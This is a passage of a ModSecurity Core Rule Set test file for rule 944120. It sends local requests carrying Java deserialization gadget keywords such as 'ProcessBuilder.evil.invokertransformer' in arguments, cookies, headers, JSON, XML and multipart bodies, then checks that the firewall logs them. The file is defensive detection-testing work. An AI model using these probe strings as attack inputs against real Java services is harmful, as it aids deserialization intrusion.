port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-65 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-66 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.instantiatetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-67 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.instantiatetransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-68 - desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-69 - desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-70 - desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-71 - desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-72 - desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-73 - desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-74 - desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-75 - desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-76 - desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-77 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-78 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-79 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-80 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-81 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.invokertransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-82 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.invokertransformer\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-83 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.invokertransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-84 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.invokertransformer\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-85 - desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-86 - desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-87 - desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-88 - desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-89 - desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-90 - desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-91 - desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-92 - desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-93 - desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-94 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-95 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-96 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-97 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-98 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-99 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-100 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeclonefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-101 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeclonefactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-102 - desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-103 - desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-104 - desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 